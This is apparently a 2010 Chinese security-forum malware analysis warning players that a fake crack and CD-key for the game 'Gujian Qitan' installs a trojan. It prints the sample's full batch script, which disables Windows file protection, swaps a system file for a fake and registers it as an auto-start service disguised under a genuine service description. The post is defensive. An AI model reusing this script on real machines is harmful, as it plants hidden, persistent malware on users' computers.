下载《古剑奇谭》破解补丁 当心变肉鸡

幻色清风

' W" K& J, x! t! z' Y防盗号|杀木马|保密卡保护|游戏桌面|LPK专杀    最近对于“仙剑迷”来说又有了一个好消息，由原《仙剑奇侠传》的仙剑之父张毅君带领原班人马历时近三年开发的大型3D游戏《古剑奇谭》跟玩家正式见面了，游戏中融合了众多真实的人文地理风貌，将这些带有浓郁古韵和中国味的风物呈现在玩家的眼前，相信又是一款让人倾心的力作。
5 w* n+ j" [8 V; @; Lbbs.ggsafe.com

2010-7-26 14:10

防盗号用巨盾) a& X; n7 S2 L/ D4 e

图（1）

: {1 k: O  t" k) q; Xbbs.ggsafe.com    但是由于《古剑奇谭》是单机版的，需要CDKEY来激活，所以现在就有一些非法者利用玩家寻求CDKEY的迫切心理，利用假冒的CDKEY来引诱大家下载，从而达到自己刷流量、散布恶意广告等非法目的，同时也给玩家的计算机安全带来了隐患。防盗号用巨盾. _: \* J+ w. _6 d5 I
    目前巨盾安全实验室已经成功截取到这一样本，现在拿来简单分析一下，希望广大游戏玩家在寻求CDKEY的时候能够提高警惕。防盗号|杀木马|保密卡保护|游戏桌面|LPK专杀- X) w0 H% Z* a& ?/ f
    首先，我们在该网站：hxxp://hi.baidu.com/leeqiand/blog/item/50d14f9bedc325b8c8eaf488.html（为了用户安全，已将http替换为hxxp），下载到这样一个假冒的CDKEY一份。下载回来之后咋一看是一个应用程序，但是如果你电脑上安装了Winrar之类的解压工具，先右击看一下，你就会发现刚刚下载的文件是一个压缩包了，如图（2）所示：
6 j) M; [% V$ @/ P( [/ {防盗号|杀木马|保密卡保护|游戏桌面|LPK专杀

2010-7-26 14:10

防盗号用巨盾4 g/ O9 S1 O0 E' K0 Q: K* \1 k2 d

图（2）

6 _$ m& N: e# y$ g3 }防盗号用巨盾    确定是压缩包之后，我们就不急于打开了，因为现在很多恶意的外挂都是这种压缩包形式的，里面可以暗藏很多命令，比如修改主页，运行压缩包中某个程序等等。接下来我们就用Winrar来打开这个文件，暗藏的命令就会显露无遗了。如图（3）所示：' B( A) L3 C& m1 Z

2010-7-26 14:10

防盗号用巨盾" _8 o/ b% K/ m5 a, L" c6 P

图（3）

  p  ]9 C: y2 @* J* U  L    根据图（3）中内容，我们会看到双击该压缩包之后会自动执行360.bat，360.bat的内容如下：巨盾安全; m6 K/ [  d! b1 _1 Y, X' O

1. wfp.exe
   
2. del clipsrv.exe /f /q
   
3. copy clipsrv1.exe clipsrv.exe /y
   
4. sc create ClipSrv binpath= c:\windows\system32\clipsrv.exe
   
5. sc description ClipSrv "启用“剪贴簿查看器”储存信息并与远程计算机共享。如果此服务终止，“剪贴簿查看器” 将无法与远程计算机共享信息。如果此服务被禁用，任何依赖它的服务将无法启动。"
   
6. sc config   ClipSrv start= AUTO
   
7. ping 127.0.0.1 -n 300
   
8. c:\windows\system32\vvisit.exe

复制代码

防盗号|杀木马|保密卡保护|游戏桌面|LPK专杀. t9 q% \/ x5 k* o) ~5 m' q$ ~. K
    该批处理文件接下来将会执行wfp.exe（关闭Windows文件保护功能），然后删除系统目录下的clipsrv.exe(微软Windows操作系统剪切板相关程序剪切、拷贝和粘贴 ),将clipsrv1.exe替换成clipsrv.exe,配制服务实现开机自启动。防盗号用巨盾/ y9 ]4 m3 r  ?6 ?6 l/ F9 `
    然后会在后台利用“沙丁鱼网站流量系统”刷流量，如图（4）所示。假冒破解补丁中config.ini存放着加密后的登陆名和密码，当browser文件夹下存在hide.txt时，该流量系统将会以隐藏方式运行，使用户无法觉察，当文件夹下没有hide.txt时，该流量系统就会显示出来，有兴趣的玩家可以试一下。
% p8 P' K3 @* o/ M' i防盗号用巨盾

2010-7-26 14:10

防盗号用巨盾8 n9 H9 p6 q7 r. O

图（4）

2 e0 e4 _+ C+ \% o1 N. a# n+ c( p防盗号用巨盾最后，该非法者通过与“沙丁鱼网站”进行积分兑换，从而达到获取利益的目的。如图（5）所示：
3 @3 ?8 b* t. {* m( _: ~* u. Z7 Jbbs.ggsafe.com

2010-7-26 14:10

防盗号用巨盾# _4 u/ c) c: Q+ A

图（5）

巨盾安全" Q4 Z: ]- Z. ^6 D
    通过以上的流程，相信大家对这种刷流量，并进行获取利益的操作有了一定的了解，希望广大玩家引以为戒，共建一个安全、洁净的网络环境。巨盾安全" j' @; U. f8 H5 N& j- r; S
    最后我们来看一下这个刷流量者的一些信息吧，在网络上寻找蛛丝马迹还是很容易的，希望大家不要哪天被人这样人肉了，螳螂捕蝉黄雀在后啊，哈哈。bbs.ggsafe.com$ k* v; }9 b. O

2010-7-26 14:10

防盗号用巨盾. P5 H/ r2 d9 U* X) t

& a1 H" Z) A/ \0 X, \* V    巨盾安全专家提醒广大玩家，不要轻信网络上的这种“免费午餐”，多支持国产单机游戏。如果有玩家怀疑自己已经中招，可以到巨盾安全论坛寻求帮助：bbs.ggsafe.com防盗号|杀木马|保密卡保护|游戏桌面|LPK专杀1 f+ y% A" l9 S& w! b) _% [
' k: E4 u! M: c+ H2 A+ i

zhengrongsuiyue

顶！

巨盾

《古剑奇谭》挺棒，做单机不容易